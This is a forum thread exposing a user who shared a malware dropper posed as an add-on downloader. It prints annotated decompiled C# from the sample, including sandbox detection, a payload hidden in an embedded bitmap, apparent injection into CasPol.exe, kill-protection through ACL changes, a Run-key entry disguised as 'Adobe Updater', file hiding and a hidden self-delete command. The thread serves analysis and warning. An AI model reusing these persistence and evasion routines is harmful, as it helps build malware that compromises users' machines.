Author Topic: kyle1836 (ID 5289) - Distributing monetized viruses on BLF  (Read 2898 times)

Here's the topic.

If you look at the virus scan link, it's actually a monetized link. Don't click it. It will give him money. You don't want that.

I downloaded the file, and mozilla firefox quickly told me it was malicious. I opened up the file in ILSpy. Here are some snippets from the code:

// Decompiled persistence / anti-analysis helper nested in Program (analyst annotations added;
// the code itself is untouched). Every method wraps its body in a catch-all, so any failure
// (missing key, denied access, missing API) is silent and leaves no trace in the process.
private class Persistence
{
// Delegate shapes for advapi32!GetKernelObjectSecurity (handle, SECURITY_INFORMATION, out
// descriptor buffer, buffer length, out required length) and advapi32!SetKernelObjectSecurity.
// They are bound by name at runtime through Program.api.create (see ProtectProcess) rather than
// a static DllImport, so the imports do not appear in the assembly's metadata.
private delegate bool g(IntPtr a, int b, [Out] byte[] c, uint d, out uint e);
private delegate bool s(IntPtr a, int b, [In] byte[] c);
// Reverses a string. Used to keep literals such as "cmd.exe" and the Explorer\Advanced registry
// path out of the binary's plain string table (see AddToStartup and HideFile).
private static string reverseStr(string inputStr)
{
char[] array = inputStr.ToCharArray();
Array.Reverse(array);
return new string(array);
}
// Run-key persistence. Drops %APPDATA%\forgetyounod32.vbs, a one-line VBScript that writes
// HKCU\Software\Microsoft\Windows\CurrentVersion\Run\"Adobe Updater" = <path of this executable>,
// then executes the script through a hidden cmd.exe ("exe.dmc" reversed) driven over stdin.
// Going through WScript.Shell.RegWrite instead of Microsoft.Win32.Registry keeps the Run-key
// write out of this process. Host indicators visible here: the .vbs file name in %APPDATA%,
// a Run value named "Adobe Updater" whose data is not an Adobe install path, and cmd.exe
// spawned with no window by this process.
private static void AddToStartup()
{
try
{
File.WriteAllText(
Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"forgetyounod32.vbs"),
string.Format(
"CreateObject(\"WScript.Shell\").RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\{0}\",\"{1}\",\"REG_SZ\"",
"Adobe Updater",
Process.GetCurrentProcess().MainModule.FileName)
);

// cmd.exe with stdin redirected: "cd <%APPDATA%>", run the dropped script, "exit".
using (Process process = Process.Start(new ProcessStartInfo(Program.Persistence.reverseStr("exe.dmc"))
{
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardInput = true,
CreateNoWindow = true
}))
{
process.EnableRaisingEvents = true;
process.StandardInput.WriteLine(string.Format("cd \"{0}\"", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)));
process.StandardInput.WriteLine("forgetyounod32.vbs");
process.StandardInput.WriteLine("exit");
process.WaitForExit();
}
}
catch
{
}
}
// Re-arms persistence: reads the "Adobe Updater" Run value and calls AddToStartup unless it already
// equals this executable's path. The default "(byte)113EFBEEF" is only a sentinel that guarantees a
// mismatch when the value is absent. The comparison is ordinal and case-sensitive, so a path that
// differs only in case would also trigger a rewrite.
public static void checkStartup()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
if ((string)registryKey.GetValue("Adobe Updater", "(byte)113EFBEEF") != Process.GetCurrentProcess().MainModule.FileName)
{
Program.Persistence.AddToStartup();
}
registryKey.Close();
}
catch
{
}
}
// Anti-termination. processData[0] is a kernel object handle and processData[1] the Program.api
// resolver; both come from Program.inj.run's return value in Main, so the handle presumably refers
// to the injected process — confirm in the inj class, which is not shown here.
// Steps: query the object's DACL (SECURITY_INFORMATION 4 == DACL_SECURITY_INFORMATION) twice —
// first with an empty buffer to learn the required size, then for real — and insert an
// ACCESS_DENIED ACE for Everyone (WorldSid) with mask 2035711 == 0x1F0FFF, i.e. PROCESS_ALL_ACCESS,
// at index 0 so it is evaluated before any allow ACE. Effect: ordinary tools running as the user
// (Task Manager, taskkill) cannot open or terminate the object; a process holding
// SeDebugPrivilege is typically still able to, so an elevated responder is the usual remedy.
// Note `num >= 0u` is always true for a uint; the only effective bound is the 32767 cap.
public static void ProtectProcess(object[] processData)
{
try
{
IntPtr a = (IntPtr)processData[0];
Program.api api = (Program.api)processData[1];
byte[] array = new byte[0];
Program.Persistence.g g = api.create<Program.Persistence.g>("advapi32", "GetKernelObjectSecurity");
uint num;
g(a, 4, array, 0u, out num);
if (num >= 0u && (ulong)num <= 32767uL)
{
if (g(a, 4, array = new byte[num], num, out num))
{
RawSecurityDescriptor rawSecurityDescriptor = new RawSecurityDescriptor(array, 0);
rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 2035711, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
byte[] array2 = new byte[rawSecurityDescriptor.BinaryLength];
rawSecurityDescriptor.GetBinaryForm(array2, 0);
api.create<Program.Persistence.s>("advapi32", "SetKernelObjectSecurity")(a, 4, array2);
}
}
}
catch
{
}
}
// File hiding. The reversed literal is HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced;
// its "Hidden" value (reversed "neddiH") is set to 0 as a REG_DWORD. Explorer documents 1 = show hidden
// files and 2 = do not show them; 0 is outside that range but, as reported in this thread, the
// observed effect is that the "show hidden files" setting is turned off. The executable
// (Modules[0], the main module) then gets the Hidden file attribute.
// Remediation: set Hidden back to 1 (or via Folder Options), remove the Run value written by
// AddToStartup, and delete the dropped .vbs and the hidden executable.
public static void HideFile()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Program.Persistence.reverseStr("decnavdA\\rerolpxE\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS"), true);
registryKey.SetValue(Program.Persistence.reverseStr("neddiH"), "0", RegistryValueKind.DWord);
registryKey.Close();
File.SetAttributes(Process.GetCurrentProcess().Modules[0].FileName, FileAttributes.Hidden);
}
catch
{
}
}
}

// Decompiled entry point (analyst annotations added; the code itself is untouched).
// Flow: sandbox check -> single-instance mutex -> decode embedded payload -> hand it to
// Program.inj.run with CasPol.exe as host -> persistence -> delayed self-delete via cmd.exe -> exit.
// Program.reverse, Program.crypt, Program.decompress and Program.inj are not visible in this listing.
private static void Main(string[] args)
{
// Anti-sandbox: SbieDll.dll is the DLL Sandboxie injects into sandboxed processes. If it is
// loaded, exit (code 8) before doing anything observable — a dynamic-analysis run inside
// Sandboxie will therefore look benign.
ProcessModuleCollection modules = Process.GetCurrentProcess().Modules;
foreach (ProcessModule processModule in modules)
{
if (processModule.ModuleName.ToLower().Contains("sbiedll.dll"))
{
Environment.Exit(8);
}
}
// Single-instance guard: the named mutex "YagbNWREZNEj" is a host indicator for this sample.
// flag is false when the mutex already existed (another instance is running) -> exit.
bool flag = true;
new Mutex(true, "YagbNWREZNEj", ref flag);
if (!flag)
{
Environment.Exit(Environment.ExitCode);
}
// num is args.Length, which the code relies on being 0: it is reused as the index into `array`,
// into the manifest resource list and into Process.Modules below (obfuscation of the constant 0;
// launching with any argument would throw out of range here).
int num = args.Length;
object[] array = new object[]
{
Assembly.GetExecutingAssembly()
};
// Payload staging, done in place in array[0]: the first embedded manifest resource is read as a
// Bitmap, then passed through Program.reverse (constant 13359), Program.crypt and Program.decompress
// to yield a byte[]. Storing the payload as image pixels keeps it out of plain resource/string scans;
// this is the "executable in the form of a bitmap" discussed in the thread. What the bytes are can only
// be confirmed by extracting them, which this listing does not do.
array[num] = ((Assembly)array[num]).GetManifestResourceStream(((Assembly)array[num]).GetManifestResourceNames()[num]);
array[num] = new Bitmap((Stream)array[num]);
array[num] = Program.reverse((Bitmap)array[num], int.Parse("13359"));
array[num] = Program.crypt((byte[])array[num]);
array[num] = Program.decompress((byte[])array[num]);
// Host path: the System32 folder with "\system32" stripped, i.e. %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\CasPol.exe,
// a signed Microsoft binary. Given the class name "inj" and a host-executable argument this is presumably
// process injection/hollowing into CasPol.exe — confirm in the inj class. Its return value replaces `array`
// and is what ProtectProcess receives (handle + api object), so a CasPol.exe child of this process with
// an Everyone-deny DACL is the expected on-host artifact.
array = Program.inj.run((byte[])array[num], null, Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "Microsoft.NET\\Framework\\v2.0.50727").ToLower().Replace("\\system32", ""), "CasPol.exe"));
// Post-injection: lock the injected object's DACL, install the "Adobe Updater" Run-key entry, hide this file.
Program.Persistence.ProtectProcess(array);
Program.Persistence.checkStartup();
Program.Persistence.HideFile();
// Self-delete attempt: a hidden cmd.exe waits roughly three seconds (ping loopback, output discarded)
// and then runs del on Modules[num].FileName — with num == 0 that is the main module, i.e. this dropper,
// the same path HideFile just marked Hidden. cmd's del skips files carrying the Hidden attribute
// unless /A is given, so the deletion may silently fail, which would match the report in this thread
// that the file stays on disk hidden. Either way the Run-key entry written by AddToStartup points at
// this path. The "ping ... > nul & del" pattern is itself a common detection signature.
Process.Start(new ProcessStartInfo
{
CreateNoWindow = true,
Arguments = " /C ping 127.0.0.1 -n 3 > nul & del \"" + Process.GetCurrentProcess().Modules[num].FileName + "\"",
FileName = "cmd.exe",
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(Environment.ExitCode);
}
Now if you don't know coding, I don't blame you. So, here's what it's doing.

First, it runs an executable that's in the form of a bitmap file that's saved within the exe itself. We have no idea what this executable does, and the only possible use of this form of obfuscation is to hide malicious code. It probably saves a copy of ui.

Second, it adds itself to the startup list in the form of an adobe product updater. That's probably how the exe hides itself. Every time you start up your computer and log on, that unknown program runs.

Third, it deletes itself.

Fourth, he loving monetized the virus scan link. Need I say more?

I love reading code that looks like it's size 4 font.

OT: /fullsupport Guy is a scumbag.

Although it's not that important now, I'd like to point out that the file does not delete itself - it makes itself hidden, and I believe it also turns off the computer's ability to show hidden files/folders (which you must then re-enable manually).

He also has a recent (May 2015) forum profile on another forum related to Bitcoin monetizing or the similar.

/support

also, lol:



why?

Noedit: i made a small mistake in the OP.

First, it runs an executable that's in the form of a bitmap file that's saved within the exe itself. We have no idea what this executable does, and the only possible use of this form of obfuscation is to hide malicious code. It probably saves a copy of itself in the appdata folder.

Although it's not that important now, I'd like to point out that the file does not delete itself - it makes itself hidden, and I believe it also turns off the computer's ability to show hidden files/folders (which you must then re-enable manually).
It turns off the computer's ability to see hidden files, and it at least deletes something, as can be seen here:
Arguments = " /C ping 127.0.0.1 -n 3 > nul & del \"" + Process.GetCurrentProcess().Modules[num].FileName + "\"",

That might be the program itself, or it might be the program it creates using the bitmap saved inside the executable. I haven't spent a ton of time analyzing the code.


^^something related probably but i'm not too sure??

Topic locked and it is in gallery. He really must think our IQ is that of a baby to think we would download.

the red flag was the fact that he provided a virus scan link lol. this guy forgeted up too hard.

6:44 PM - nal: did you double click it when you opened it
6:44 PM - nal: because when i did it just redirected me to the dl page
6:45 PM - Ipquarx: cur.lv is literally a website called "CoinURL"
6:45 PM - Ipquarx: "The smart way to monetize your content!"
6:45 PM - nal: again
6:46 PM - nal: i downloaded it to do a virus total scan
6:46 PM - Ipquarx: the virus scan is monetized
6:46 PM - Ipquarx: not the download link
6:46 PM - nal: and double clicked it by accident
6:46 PM - nal: where it says its blocked
6:46 PM - nal: did it require uac
6:47 PM - Ipquarx: wait
6:47 PM - Ipquarx: are you saying you ran it
6:47 PM - nal: no
6:47 PM - nal: im saying i think i did
6:47 PM - nal: by accident
6:47 PM - nal: i knew it was fake
6:47 PM - Ipquarx: it requires admin privileges
6:47 PM - nal: okay then im fine
6:47 PM - nal: i didnt get a prompt for it and i have uac enabled + did a virus scan


just posting this here, for anyone that happens to have this issue, it required UAC


^^something related probably but i'm not too sure??

Ironically..



Although it is starting to get a little far fetched.

That might be the program itself, or it might be the program it creates using the bitmap saved inside the executable. I haven't spent a ton of time analyzing the code.

Very curious to find out what this file does exactly.
Running the file came up with nothing but this on a virtual machine running Windows XP SP3:



Probably the fact that it's XP, but still.

gonna try it on windows 10

/support, just looking at the thread and file name gave red flags everywhere, including no screenshots of the "program" (which very clearly never existed). An "add-on downloader"... seriously, they couldn't think of anything else that would've made more sense or been more convincing, considering I never have trouble downloading add-ons, not to mention there are plenty of legitimate sources of add-ons and packs; the point is, it's blatantly obvious that it's malicious.


this is the startup process

%appdata%

/support. It's also pretty sketchy that he isn't trying to defend himself in this thread.

/support. It's also pretty sketchy that he isn't trying to defend himself in this thread.
Probably better for him not to post. He's already dug himself a deep enough grave.

Probably better for him not to post. He's already dug himself a deep enough grave.
Fair point, but if he is stupid enough to think that we will download anything with zero explanation, he'd put up a fight, speaking from experience. See: me defending myself in every drama about me ever.